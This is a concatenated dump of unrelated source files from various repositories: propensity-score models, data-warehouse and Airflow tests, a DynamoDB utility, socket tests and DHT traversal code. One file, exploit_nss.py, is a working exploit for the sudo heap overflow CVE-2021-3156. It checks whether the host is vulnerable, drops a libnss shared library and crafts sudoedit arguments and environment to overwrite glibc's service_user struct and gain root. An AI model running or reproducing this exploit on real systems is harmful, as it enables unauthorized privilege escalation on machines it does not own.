Propensity regression model based on the LogisticRegression algorithm.
"""
@property
def _model(self):
kwargs = {
'penalty': 'elasticnet',
'solver': 'saga',
'Cs': np.logspace(1e-3, 1 - 1e-3, 4),
'l1_ratios': np.linspace(1e-3, 1 - 1e-3, 4),
'cv': StratifiedKFold(
n_splits=self.model_kwargs.pop('n_fold') if 'n_fold' in self.model_kwargs else 4,
shuffle=True,
random_state=self.model_kwargs.get('random_state', 42)
),
'random_state': 42,
}
kwargs.update(self.model_kwargs)
return LogisticRegressionCV(**kwargs)
class ElasticNetPropensityModel(LogisticRegressionPropensityModel):
pass
class GradientBoostedPropensityModel(PropensityModel):
"""
Gradient boosted propensity score model with optional early stopping.
Notes
-----
Please see the xgboost documentation for more information on gradient boosting tuning parameters:
https://xgboost.readthedocs.io/en/latest/python/python_api.html
"""
def __init__(
self,
early_stop=False,
clip_bounds=(1e-3, 1 - 1e-3),
**model_kwargs
):
super(GradientBoostedPropensityModel, self).__init__(clip_bounds, **model_kwargs)
self.early_stop = early_stop
@property
def _model(self):
kwargs = {
'max_depth': 8,
'learning_rate': 0.1,
'n_estimators': 100,
'objective': 'binary:logistic',
'nthread': -1,
'colsample_bytree': 0.8,
'random_state': 42,
}
kwargs.update(self.model_kwargs)
return xgb.XGBClassifier(**kwargs)
def fit(self, X, y, early_stopping_rounds=10, stop_val_size=0.2):
"""
Fit a propensity model.
Args:
X (numpy.ndarray): a feature matrix
y (numpy.ndarray): a binary target vector
"""
if self.early_stop:
X_train, X_val, y_train, y_val = train_test_split(
X, y, test_size=stop_val_size
)
self.model.fit(
X_train,
y_train,
eval_set=[(X_val, y_val)],
early_stopping_rounds=early_stopping_rounds
)
else:
super(GradientBoostedPropensityModel, self).fit(X, y)
def predict(self, X):
"""
Predict propensity scores.
Args:
X (numpy.ndarray): a feature matrix
Returns:
(numpy.ndarray): Propensity scores between 0 and 1.
"""
if self.early_stop:
return np.clip(
self.model.predict_proba(
X,
ntree_limit=self.model.best_ntree_limit
)[:, 1],
*self.clip_bounds
)
else:
return super(GradientBoostedPropensityModel, self).predict(X)
def calibrate(ps, treatment):
"""Calibrate propensity scores with logistic GAM.
Ref: https://pygam.readthedocs.io/en/latest/api/logisticgam.html
Args:
ps (numpy.array): a propensity score vector
treatment (numpy.array): a binary treatment vector (0: control, 1: treated)
Returns:
(numpy.array): a calibrated propensity score vector
"""
gam = LogisticGAM(s(0)).fit(ps, treatment)
return gam.predict_proba(ps)
def compute_propensity_score(X, treatment, p_model=None, X_pred=None, treatment_pred=None, calibrate_p=True):
"""Generate propensity score if user didn't provide
Args:
X (np.matrix): features for training
treatment (np.array or pd.Series): a treatment vector for training
p_model (propensity model object, optional):
ElasticNetPropensityModel (default) / GradientBoostedPropensityModel
X_pred (np.matrix, optional): features for prediction
treatment_pred (np.array or pd.Series, optional): a treatment vector for prediciton
calibrate_p (bool, optional): whether calibrate the propensity score
Returns:
(tuple)
- p (numpy.ndarray): propensity score
- p_model (PropensityModel): a trained PropensityModel object
"""
if treatment_pred is None:
treatment_pred = treatment.copy()
if p_model is None:
p_model = ElasticNetPropensityModel()
p_model.fit(X, treatment)
if X_pred is None:
p = p_model.predict(X)
else:
p = p_model.predict(X_pred)
if calibrate_p:
logger.info('Calibrating propensity scores.')
p = calibrate(p, treatment_pred)
# force the p values within the range
eps = np.finfo(float).eps
p = np.where(p < 0 + eps, 0 + eps*1.001, p)
p = np.where(p > 1 - eps, 1 - eps*1.001, p)
return p, p_model
|
tests/local/warehouse/metrics/test_filter_and_group_by.py | pgoslatara/soda-sql | 787 | 11089934 | <reponame>pgoslatara/soda-sql<gh_stars>100-1000
# Copyright 2020 Soda
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from sodasql.scan.scan_yml_parser import KEY_COLUMNS
from tests.common.sql_test_case import SqlTestCase
class FilterAndGroupByTest(SqlTestCase):
"""
Due to the use of multiple inheritance, setUp() methods for all inherited classes will be called, thus,
one should not put anything in setUp() that can affect other test methods, such as creating tables.
"""
def test_row_count_with_filter_and_group_by(self):
self._create_test_table()
metric = {
'type': 'row_count',
'filter': {
'type': 'and',
'andExpressions': [{
'type': 'not',
'expression': {
'type': 'equals',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'one'
}
}
},
{
'type': 'lessThan',
'left': {
'type': 'columnValue',
'columnName': 'size'
},
'right': {
'type': 'number',
'value': 6
}
}
]
},
'groupBy': ['name']
}
rows = self.execute_metric(self.warehouse, metric)
logging.debug(str(rows))
count_by_name = {row[0]: row[1] for row in rows}
self.assertEqual(count_by_name['two'], 4)
self.assertEqual(count_by_name['three'], 5)
self.assertEqual(count_by_name['four'], 2)
def test_sum_with_filter_and_group_by(self):
self._create_test_table()
metric = {
'type': 'sum',
'columnName': 'size',
'filter': {
'type': 'contains',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 't'
}
},
'groupBy': ['name']
}
rows = self.execute_metric(self.warehouse, metric)
logging.debug(str(rows))
sum_by_name = {row[0]: row[1] for row in rows}
self.assertEqual(sum_by_name['two'], 10)
self.assertEqual(sum_by_name['three'], 28)
def test_sum_with_filter_and_group_by_and_custom_missing(self):
self._create_test_table()
metric = {
'type': 'sum',
'columnName': 'size',
'filter': {
'type': 'lessThan',
'left': {
'type': 'columnValue',
'columnName': 'size'
},
'right': {
'type': 'number',
'value': 4
}
},
'groupBy': ['name']
}
rows = self.execute_metric(self.warehouse, metric, {
KEY_COLUMNS: {
'size': {
'missing_values': [1, 100]
}
}
})
logging.debug(str(rows))
sum_by_name = {row[0]: row[1] for row in rows}
self.assertEqual(sum_by_name['two'], 5)
self.assertEqual(sum_by_name['three'], 5)
self.assertEqual(sum_by_name['four'], 2)
self.assertIsNone(sum_by_name.get('one'))
def test_contains_expression(self):
self._create_test_table()
where_expr = self.warehouse.dialect.sql_expression({
'type': 'contains',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'ou'
}
})
rows = self.warehouse.sql_fetchall(
f'SELECT * \n'
f'FROM {self.default_test_table_name} \n'
f'WHERE {where_expr}')
self.assertEqual(len(rows), 2)
for row in rows:
self.assertEqual(row[0], 'four')
where_expr = self.warehouse.dialect.sql_expression({
'type': 'startsWith',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'thr'
}
})
rows = self.warehouse.sql_fetchall(
f'SELECT * \n'
f'FROM {self.default_test_table_name} \n'
f'WHERE {where_expr}')
self.assertEqual(len(rows), 7)
for row in rows:
self.assertEqual(row[0], 'three')
where_expr = self.warehouse.dialect.sql_expression({
'type': 'endsWith',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'ee'
}
})
rows = self.warehouse.sql_fetchall(
f'SELECT * \n'
f'FROM {self.default_test_table_name} \n'
f'WHERE {where_expr}')
self.assertEqual(len(rows), 7)
for row in rows:
self.assertEqual(row[0], 'three')
def _create_test_table(self):
self.sql_recreate_table(
[f"name {self.dialect.data_type_varchar_255}",
f"size {self.dialect.data_type_integer}"],
["('one', 1)",
"('two', 1)",
"('two', 2)",
"('two', 3)",
"('two', 4)",
"('three', 1)",
"('three', 2)",
"('three', 3)",
"('three', 4)",
"('three', 5)",
"('three', 6)",
"('three', 7)",
"('four', 1)",
"('four', 2)",
"(null, 1)"])
|
exploit_nss.py | marcostolosa/CVE-2021-3156 | 473 | 11089939 | #!/usr/bin/python3
'''
Exploit for CVE-2021-3156 with overwrite struct service_user by sleepya
This exploit requires:
- glibc with tcache
- nscd service is not running
Tested on:
- Ubuntu 18.04
- Ubuntu 20.04
- Debian 10
- CentOS 8
'''
import os
import subprocess
import sys
from ctypes import cdll, c_char_p, POINTER, c_int, c_void_p
SUDO_PATH = b"/usr/bin/sudo"
libc = cdll.LoadLibrary("libc.so.6")
# don't use LC_ALL (6). it override other LC_
LC_CATS = [
b"LC_CTYPE", b"LC_NUMERIC", b"LC_TIME", b"LC_COLLATE", b"LC_MONETARY",
b"LC_MESSAGES", b"LC_ALL", b"LC_PAPER", b"LC_NAME", b"LC_ADDRESS",
b"LC_TELEPHONE", b"LC_MEASUREMENT", b"LC_IDENTIFICATION"
]
def check_is_vuln():
# below commands has no log because it is invalid argument for both patched and unpatched version
# patched version, error because of '-s' argument
# unpatched version, error because of '-A' argument but no SUDO_ASKPASS environment
r, w = os.pipe()
pid = os.fork()
if not pid:
# child
os.dup2(w, 2)
execve(SUDO_PATH, [ b"sudoedit", b"-s", b"-A", b"/aa", None ], [ None ])
exit(0)
# parent
os.close(w)
os.waitpid(pid, 0)
r = os.fdopen(r, 'r')
err = r.read()
r.close()
if "sudoedit: no askpass program specified, try setting SUDO_ASKPASS" in err:
return True
assert err.startswith('usage: ') or "invalid mode flags " in err, err
return False
def create_libx(name):
so_path = 'libnss_'+name+'.so.2'
if os.path.isfile(so_path):
return # existed
so_dir = 'libnss_' + name.split('/')[0]
if not os.path.exists(so_dir):
os.makedirs(so_dir)
import zlib
import base64
libx_b64 = '<KEY>'
with open(so_path, 'wb') as f:
f.write(zlib.decompress(base64.b64decode(libx_b64)))
#os.chmod(so_path, 0o755)
def check_nscd_condition():
if not os.path.exists('/var/run/nscd/socket'):
return True # no socket. no service
# try connect
import socket
sk = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sk.connect('/var/run/nscd/socket')
except:
return True
else:
sk.close()
with open('/etc/nscd.conf', 'r') as f:
for line in f:
line = line.strip()
if not line.startswith('enable-cache'):
continue # comment
service, enable = line.split()[1:]
# in fact, if only passwd is enabled, exploit with this method is still possible (need test)
# I think no one enable passwd but disable group
if service == 'passwd' and enable == 'yes':
return False
# group MUST be disabled to exploit sudo with nss_load_library() trick
if service == 'group' and enable == 'yes':
return False
return True
def get_libc_version():
output = subprocess.check_output(['ldd', '--version'], universal_newlines=True)
for line in output.split('\n'):
if line.startswith('ldd '):
ver_txt = line.rsplit(' ', 1)[1]
return list(map(int, ver_txt.split('.')))
return None
def check_libc_version():
version = get_libc_version()
assert version, "Cannot detect libc version"
# this exploit only works which glibc tcache (added in 2.26)
return version[0] >= 2 and version[1] >= 26
def check_libc_tcache():
libc.malloc.argtypes = (c_int,)
libc.malloc.restype = c_void_p
libc.free.argtypes = (c_void_p,)
# small bin or tcache
size1, size2 = 0xd0, 0xc0
mems = [0]*32
# consume all size2 chunks
for i in range(len(mems)):
mems[i] = libc.malloc(size2)
mem1 = libc.malloc(size1)
libc.free(mem1)
mem2 = libc.malloc(size2)
libc.free(mem2)
for addr in mems:
libc.free(addr)
return mem1 != mem2
def get_service_user_idx():
'''Parse /etc/nsswitch.conf to find a group entry index
'''
idx = 0
found = False
with open('/etc/nsswitch.conf', 'r') as f:
for line in f:
if line.startswith('#'):
continue # comment
line = line.strip()
if not line:
continue # empty line
words = line.split()
if words[0] == 'group:':
found = True
break
for word in words[1:]:
if word[0] != '[':
idx += 1
assert found, '"group" database is not found. might be exploitable but no test'
return idx
def get_extra_chunk_count(target_chunk_size):
# service_user are allocated by calling getpwuid()
# so we don't care allocation of chunk size 0x40 after getpwuid()
# there are many string that size can be varied
# here is the most common
chunk_cnt = 0
# get_user_info() -> get_user_groups() ->
gids = os.getgroups()
malloc_size = len("groups=") + len(gids) * 11
chunk_size = (malloc_size + 8 + 15) & 0xfffffff0 # minimum size is 0x20. don't care here
if chunk_size == target_chunk_size: chunk_cnt += 1
# host=<hostname> (unlikely)
# get_user_info() -> sudo_gethostname()
import socket
malloc_size = len("host=") + len(socket.gethostname()) + 1
chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
if chunk_size == target_chunk_size: chunk_cnt += 1
# simply parse "networks=" from "ip addr" command output
# another workaround is bruteforcing with number of 0x70
# policy_open() -> format_plugin_settings() ->
# a value is created from "parse_args() -> get_net_ifs()" with very large buffer
try:
import ipaddress
except:
return chunk_cnt
cnt = 0
malloc_size = 0
proc = subprocess.Popen(['ip', 'addr'], stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)
for line in proc.stdout:
line = line.strip()
if not line.startswith('inet'):
continue
if cnt < 2: # skip first 2 address (lo interface)
cnt += 1
continue;
addr = line.split(' ', 2)[1]
mask = str(ipaddress.ip_network(addr if sys.version_info >= (3,0,0) else addr.decode("UTF-8"), False).netmask)
malloc_size += addr.index('/') + 1 + len(mask)
cnt += 1
malloc_size += len("network_addrs=") + cnt - 3 + 1
chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
if chunk_size == target_chunk_size: chunk_cnt += 1
proc.wait()
return chunk_cnt
def execve(filename, argv, envp):
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(envp))(*envp)
libc.execve(filename, cargv, cenvp)
def lc_env(cat_id, chunk_len):
name = b"C.UTF-8@"
name = name.ljust(chunk_len - 0x18, b'Z')
return LC_CATS[cat_id]+b"="+name
assert check_is_vuln(), "target is patched"
assert check_libc_version(), "glibc is too old. The exploit is relied on glibc tcache feature. Need version >= 2.26"
assert check_libc_tcache(), "glibc tcache is not found"
assert check_nscd_condition(), "nscd service is running, exploit is impossible with this method"
service_user_idx = get_service_user_idx()
assert service_user_idx < 9, '"group" db in nsswitch.conf is too far, idx: %d' % service_user_idx
create_libx("X/X1234")
# Note: actions[5] can be any value. library and known MUST be NULL
FAKE_USER_SERVICE_PART = [ b"\\" ] * 0x18 + [ b"X/X1234\\" ]
TARGET_OFFSET_START = 0x780
FAKE_USER_SERVICE = FAKE_USER_SERVICE_PART*30
FAKE_USER_SERVICE[-1] = FAKE_USER_SERVICE[-1][:-1] # remove last '\\'. stop overwritten
CHUNK_CMND_SIZE = 0xf0
# Allow custom extra_chunk_cnt incase unexpected allocation
# Note: this step should be no need when CHUNK_CMND_SIZE is 0xf0
extra_chunk_cnt = get_extra_chunk_count(CHUNK_CMND_SIZE) if len(sys.argv) < 2 else int(sys.argv[1])
argv = [ b"sudoedit", b"-A", b"-s", b"A"*(CHUNK_CMND_SIZE-0x10)+b"\\", None ]
env = [ b"Z"*(TARGET_OFFSET_START + 0xf - 8 - 1) + b"\\" ] + FAKE_USER_SERVICE
# first 2 chunks are fixed. chunk40 (target service_user) is overwritten from overflown cmnd (in get_cmnd)
env.extend([ lc_env(0, 0x40)+b";A=", lc_env(1, CHUNK_CMND_SIZE) ])
# add free chunks that created before target service_user
for i in range(2, service_user_idx+2):
# skip LC_ALL (6)
env.append(lc_env(i if i < 6 else i+1, 0x40))
if service_user_idx == 0:
env.append(lc_env(2, 0x20)) # for filling hole
for i in range(11, 11-extra_chunk_cnt, -1):
env.append(lc_env(i, CHUNK_CMND_SIZE))
env.append(lc_env(12, 0x90)) # for filling holes from freed file buffer
env.append(b"TZ=:") # shortcut tzset function
# don't put "SUDO_ASKPASS" environment. sudo will fail without logging if no segfault
env.append(None)
execve(SUDO_PATH, argv, env)
|
chapter09/tests/airflowbook/operators/test_movielens_operator.py | add54/Data_PipeLine_Apache_Airflow | 303 | 11089951 | <filename>chapter09/tests/airflowbook/operators/test_movielens_operator.py
import datetime
import os
from collections import namedtuple
from pathlib import Path
import pytest
from airflow.models import DAG, Connection
from pytest_docker_tools import fetch, container
from pytest_mock import MockFixture
from airflowbook.operators.movielens_operator import (
MovielensDownloadOperator,
MovielensHook,
MovielensToPostgresOperator,
PostgresHook,
)
@pytest.fixture(scope="module")
def postgres_credentials():
PostgresCredentials = namedtuple("PostgresCredentials", ["username", "password"])
return PostgresCredentials("testuser", "testpass")
postgres_image = fetch(repository="postgres:11.1-alpine")
postgres = container(
image="{postgres_image.id}",
environment={
"POSTGRES_USER": "{postgres_credentials.username}",
"POSTGRES_PASSWORD": "{postgres_credentials.password}",
},
ports={"5432/tcp": None},
volumes={
os.path.join(os.path.dirname(__file__), "postgres-init.sql"): {
"bind": "/docker-entrypoint-initdb.d/postgres-init.sql"
}
},
)
def test_movielens_operator(tmp_path: Path, mocker: MockFixture):
mocker.patch.object(
MovielensHook,
"get_connection",
return_value=Connection(conn_id="test", login="airflow", password="<PASSWORD>"),
)
dag = DAG(
"test_dag",
default_args={"owner": "airflow", "start_date": datetime.datetime(2019, 1, 1)},
schedule_interval="@daily",
)
task = MovielensDownloadOperator(
task_id="test",
conn_id="testconn",
start_date="{{ prev_ds }}",
end_date="{{ ds }}",
output_path=str(tmp_path / "{{ ds }}.json"),
dag=dag,
)
dag.clear()
task.run(
start_date=dag.default_args["start_date"],
end_date=dag.default_args["start_date"],
ignore_ti_state=True,
)
def test_movielens_to_postgres_operator(
mocker: MockFixture, test_dag: DAG, postgres, postgres_credentials
):
mocker.patch.object(
MovielensHook,
"get_connection",
return_value=Connection(conn_id="test", login="airflow", password="<PASSWORD>"),
)
mocker.patch.object(
PostgresHook,
"get_connection",
return_value=Connection(
conn_id="postgres",
conn_type="postgres",
host="localhost",
login=postgres_credentials.username,
password=postgres_credentials.password,
port=postgres.ports["5432/tcp"][0],
),
)
task = MovielensToPostgresOperator(
task_id="test",
movielens_conn_id="movielens_id",
start_date="{{ prev_ds }}",
end_date="{{ ds }}",
postgres_conn_id="postgres_id",
insert_query=(
"INSERT INTO movielens (movieId,rating,ratingTimestamp,userId,scrapeTime) "
"VALUES ({0}, '{{ macros.datetime.now() }}')"
),
dag=test_dag,
)
pg_hook = PostgresHook()
row_count = pg_hook.get_first("SELECT COUNT(*) FROM movielens")[0]
assert row_count == 0
pytest.helpers.run_airflow_task(task, test_dag)
row_count = pg_hook.get_first("SELECT COUNT(*) FROM movielens")[0]
assert row_count > 0
postgres_container = container(image="{postgres_image.id}", ports={"5432/tcp": None})
def test_call_fixture(postgres_container):
print(
f"Running Postgres container named {postgres_container.name} "
f"on port {postgres_container.ports['5432/tcp'][0]}."
)
|
local_data_api/resources/sqlite.py | roganov/local-data-api | 102 | 11089961 | from __future__ import annotations
import sqlite3
from typing import TYPE_CHECKING, Any, Dict, List, Optional
from sqlalchemy.dialects import sqlite
from local_data_api.models import ColumnMetadata, Field
from local_data_api.resources.resource import Resource, register_resource_type
if TYPE_CHECKING: # pragma: no cover
from local_data_api.resources.resource import ConnectionMaker, Cursor
@register_resource_type
class SQLite(Resource):
def autocommit_off(self) -> None:
# default is off
pass
def create_column_metadata_set(self, cursor: Cursor) -> List[ColumnMetadata]:
raise NotImplementedError
DIALECT = sqlite.dialect(paramstyle='named')
@classmethod
def create_connection_maker(
cls,
host: Optional[str] = None,
port: Optional[int] = None,
user_name: Optional[str] = None,
password: Optional[str] = None,
engine_kwargs: Dict[str, Any] = None,
) -> ConnectionMaker:
def connect(_: Optional[str] = None): # type: ignore
return sqlite3.connect(':memory:')
return connect
def get_field_from_value(self, value: Any) -> Field:
return super().get_field_from_value(value)
|
dev/Gems/CloudGemMessageOfTheDay/AWS/lambda-code/ServiceLambda/message_utils.py | jeikabu/lumberyard | 1,738 | 11089984 | <filename>dev/Gems/CloudGemMessageOfTheDay/AWS/lambda-code/ServiceLambda/message_utils.py
import importlib
import boto3
import CloudCanvas
import errors
from cgf_utils import custom_resource_utils
from datetime import datetime
# Had to use these custom min and max rather than datetime.min because datetime.strttime will not accept a date prior to 1900
custom_datetime_min = 'Jan 1 1900 00:00'
custom_datetime_min_as_number = 190001010000
custom_datetime_max = 'Dec 31 2100 23:59'
custom_datetime_max_as_number = 210012312359
message_size_limit = 700
def get_message_table():
if not hasattr(get_message_table, 'message_table'):
message_table_name = custom_resource_utils.get_embedded_physical_id(CloudCanvas.get_setting('MessageTable'))
message_table = boto3.resource(
'dynamodb').Table(message_table_name)
if message_table is None:
raise RuntimeError('No Message Table')
return message_table
#time utility functions
def _get_time_format():
return '%b %d %Y %H:%M'
def get_struct_time(timestring):
try:
return datetime.strptime(timestring, _get_time_format())
except ValueError:
raise errors.ClientError('Expected time format {}'.format(get_formatted_time_string(datetime.utcnow())))
def get_formatted_time(timeval):
return datetime.strftime(timeval, '%b %d %Y %H:%M')
def get_time_as_number(timestring):
if timestring is None:
timeStruct = datetime.utcnow()
return int(datetime.strftime(timeStruct, '%Y%m%d%H%M'))
timeStruct = get_struct_time(timestring)
return int(datetime.strftime(timeStruct, '%Y%m%d%H%M'))
def get_struct_time_as_number(timestruct):
return int(datetime.strftime(timestruct, '%Y%m%d%H%M'))
def get_formatted_time_from_number(timenum):
year = int(timenum/100000000)
remain = int(timenum - year*100000000)
month = int(remain/1000000)
remain -= month*1000000
day = int(remain/10000)
remain -= day*10000
hour = int(remain/100)
minute = remain - hour*100
d = datetime(year, month, day, hour, minute)
return get_formatted_time(d)
def validate_start_end_times(start_timeval, end_timeval):
#Scheduling with start and end time
if get_struct_time(end_timeval) <= get_struct_time(start_timeval):
raise errors.ClientError('Invalid: End time ' + end_timeval + ' <= Start time ' + start_timeval)
#Scheduling with no end time is always valid
return True
|
src/pydybm/arraymath/__init__.py | ibm-research-tokyo/dybm | 126 | 11089998 | <filename>src/pydybm/arraymath/__init__.py
# (C) Copyright IBM Corp. 2016
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Interface of array modules.
pydybm modules use multi-dimensional arrays via this interface.
Two implementations for this interface are given: numpy and cupy.
Users can enable DyBMs based on either by importing ``arraymath.dynumpy`` or
``arraymath.dycupy`` modules and giving it to ``setup`` function.
"""
__author__ = "<NAME>"
from . import dynumpy
def setup(lib):
''' Enable an array module globally.
Parameters
----------
lib: arraymath.dynumpy or arraymath.dycupy
'''
global to_numpy, array, empty, zeros, ones, arange, eye
to_numpy = lib.to_numpy
array = lib.array
empty = lib.empty
zeros = lib.zeros
ones = lib.ones
arange = lib.arange
eye = lib.eye
''' Attributes '''
global ndim
ndim = lib.ndim
''' Mathematical operations on arrays or numbers '''
global log, exp, sqrt, abs, sign, sin, tanh, floor
log = lib.log
exp = lib.exp
sqrt = lib.sqrt
abs = lib.abs
sign = lib.sign
sin = lib.sin
tanh = lib.tanh
floor = lib.floor
''' Reduction operations on arrays '''
global sum, max, mean, median, var, prod, cond, argmax, asarray
global root_mean_square_err
sum = lib.sum
max = lib.max
mean = lib.mean
median = lib.median
var = lib.var
prod = lib.prod
cond = lib.cond
argmax = lib.argmax
asarray = lib.asarray
root_mean_square_err = lib.root_mean_square_err
''' Matrix operations '''
global dot, transpose, tensordot, multiply
dot = lib.dot
transpose = lib.transpose
tensordot = lib.tensordot
multiply = lib.multiply
global maximum, minimum, concatenate
maximum = lib.maximum
minimum = lib.minimum
concatenate = lib.concatenate
global diag, roll, allclose, outer, inner
diag = lib.diag
roll = lib.roll
allclose = lib.allclose
outer = lib.outer
inner = lib.inner
''' Constants '''
global inf, pi, identity, newaxis
inf = lib.inf
pi = lib.pi
identity = lib.identity
newaxis = lib.newaxis
''' Modules '''
global random
random = lib.random
''' scipy functions '''
global cho_factor, cho_solve, linalg_solve
global stats_multivariate_normal_logpdf
cho_factor = lib.cho_factor
cho_solve = lib.cho_solve
linalg_solve = lib.linalg_solve
stats_multivariate_normal_logpdf = lib.stats_multivariate_normal_logpdf
''' sklearn functions '''
global mean_squared_error, kernel_metrics, log_logistic
mean_squared_error = lib.mean_squared_error
kernel_metrics = lib.kernel_metrics
log_logistic = lib.log_logistic
''' advanced indexing '''
global assign_if_true
assign_if_true = lib.assign_if_true
''' Matrix operations '''
global op
op = lib.op
''' FIFO data structures '''
global FIFO
FIFO = lib.fifo.FIFO
''' DataQueue '''
global DataQueue
DataQueue = lib.DataQueue
setup(dynumpy)
|
test/utils/test_yaml.py | idoby/SimpleParsing | 150 | 11090001 | <reponame>idoby/SimpleParsing<gh_stars>100-1000
""" Tests for serialization to/from yaml files. """
from collections import OrderedDict
from dataclasses import dataclass, field, fields
from typing import Any, Dict, List, Optional, Tuple, Mapping, Type
from pathlib import Path
import pytest
import textwrap
from simple_parsing import mutable_field, list_field
from simple_parsing.helpers.serialization import YamlSerializable
from test.conftest import silent
import yaml
@dataclass
class Point(YamlSerializable):
x: int = 0
y: int = 0
@dataclass
class Config(YamlSerializable):
name: str = "train"
bob: int = 123
some_float: float = 1.23
points: List[Point] = list_field()
def test_dumps():
p1 = Point(x=1, y=6)
p2 = Point(x=3, y=1)
config = Config(name="heyo", points=[p1, p2])
assert config.dumps() == textwrap.dedent(
"""\
bob: 123
name: heyo
points:
- x: 1
y: 6
- x: 3
y: 1
some_float: 1.23
"""
)
def test_dumps_loads():
p1 = Point(x=1, y=6)
p2 = Point(x=3, y=1)
config = Config(name="heyo", points=[p1, p2])
assert Config.loads(config.dumps()) == config
assert config == Config.loads(
textwrap.dedent(
"""\
bob: 123
name: heyo
points:
- x: 1
y: 6
- x: 3
y: 1
some_float: 1.23
"""
)
)
def test_save_yaml(HyperParameters, tmpdir: Path):
hparams = HyperParameters.setup("")
tmp_path = Path(tmpdir / "temp.yml")
hparams.save_yaml(tmp_path)
_hparams = HyperParameters.load_yaml(tmp_path)
assert hparams == _hparams
def test_save_json(HyperParameters, tmpdir: Path):
hparams = HyperParameters.setup("")
tmp_path = Path(tmpdir / "temp.json")
hparams.save_yaml(tmp_path)
_hparams = HyperParameters.load_yaml(tmp_path)
assert hparams == _hparams
def test_save_yml(HyperParameters, tmpdir: Path):
hparams = HyperParameters.setup("")
tmp_path = Path(tmpdir / "temp.yml")
hparams.save(tmp_path)
_hparams = HyperParameters.load(tmp_path)
assert hparams == _hparams
# def test_save_yml(HyperParameters, tmpdir: Path):
# hparams = HyperParameters.setup("")
# tmp_path = Path(tmpdir / "temp.pth")
# hparams.save(tmp_path)
# _hparams = HyperParameters.load(tmp_path)
# assert hparams == _hparams
|
tests/debugpy/common/test_socket.py | r3m0t/debugpy | 695 | 11090053 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import sys
from debugpy.common import sockets
class TestSocketServerReuse(object):
HOST1 = "127.0.0.1"
# NOTE: Windows allows loopback range 127/8. Some flavors of Linux support
# 127/8 range. Mac by default supports only 127/0. Configuring /etc/network/interface
# for this one test is overkill so use '0.0.0.0' on Mac instead.
HOST2 = "127.0.0.2" if sys.platform != "darwin" else "0.0.0.0"
def test_reuse_same_address_port(self):
# NOTE: This test should ensure that same address port can be used by two
# sockets. This to prevent accidental changes to socket options. In Windows
# SO_REUSEADDR flag allows two sockets to bind to same address:port combination.
# Windows should always use SO_EXCLUSIVEADDRUSE
sock1 = sockets.create_server(self.HOST1, 0)
try:
_, PORT1 = sock1.getsockname()
with pytest.raises(Exception):
sockets.create_server(self.HOST1, PORT1)
finally:
sockets.close_socket(sock1)
def test_reuse_same_port(self):
try:
sock1, sock2 = None, None
sock1 = sockets.create_server(self.HOST1, 0)
_, PORT1 = sock1.getsockname()
sock2 = sockets.create_server(self.HOST2, PORT1)
assert sock1.getsockname() == (self.HOST1, PORT1)
assert sock2.getsockname() == (self.HOST2, PORT1)
except Exception:
pytest.fail()
finally:
if sock1 is not None:
sockets.close_socket(sock1)
if sock2 is not None:
sockets.close_socket(sock2)
|
hivemind/dht/traverse.py | protagohhz/hivemind | 1,026 | 11090055 | """ Utility functions for crawling DHT nodes, used to get and store keys in a DHT """
import asyncio
import heapq
from collections import Counter
from typing import Any, Awaitable, Callable, Collection, Dict, List, Optional, Set, Tuple
from hivemind.dht.routing import DHTID
ROOT = 0 # alias for heap root
async def simple_traverse_dht(
query_id: DHTID,
initial_nodes: Collection[DHTID],
beam_size: int,
get_neighbors: Callable[[DHTID], Awaitable[Tuple[Collection[DHTID], bool]]],
visited_nodes: Collection[DHTID] = (),
) -> Tuple[Tuple[DHTID], Set[DHTID]]:
"""
Traverse the DHT graph using get_neighbors function, find :beam_size: nearest nodes according to DHTID.xor_distance.
:note: This is a simplified (but working) algorithm provided for documentation purposes. Actual DHTNode uses
`traverse_dht` - a generalization of this this algorithm that allows multiple queries and concurrent workers.
:param query_id: search query, find k_nearest neighbors of this DHTID
:param initial_nodes: nodes used to pre-populate beam search heap, e.g. [my_own_DHTID, ...maybe_some_peers]
:param beam_size: beam search will not give up until it exhausts this many nearest nodes (to query_id) from the heap
Recommended value: A beam size of k_nearest * (2-5) will yield near-perfect results.
:param get_neighbors: A function that returns neighbors of a given node and controls beam search stopping criteria.
async def get_neighbors(node: DHTID) -> neighbors_of_that_node: List[DHTID], should_continue: bool
If should_continue is False, beam search will halt and return k_nearest of whatever it found by then.
:param visited_nodes: beam search will neither call get_neighbors on these nodes, nor return them as nearest
:returns: a list of k nearest nodes (nearest to farthest), and a set of all visited nodes (including visited_nodes)
"""
visited_nodes = set(visited_nodes) # note: copy visited_nodes because we will add more nodes to this collection.
initial_nodes = [node_id for node_id in initial_nodes if node_id not in visited_nodes]
if not initial_nodes:
return (), visited_nodes
unvisited_nodes = [(distance, uid) for uid, distance in zip(initial_nodes, query_id.xor_distance(initial_nodes))]
heapq.heapify(unvisited_nodes) # nearest-first heap of candidates, unlimited size
nearest_nodes = [(-distance, node_id) for distance, node_id in heapq.nsmallest(beam_size, unvisited_nodes)]
heapq.heapify(
nearest_nodes
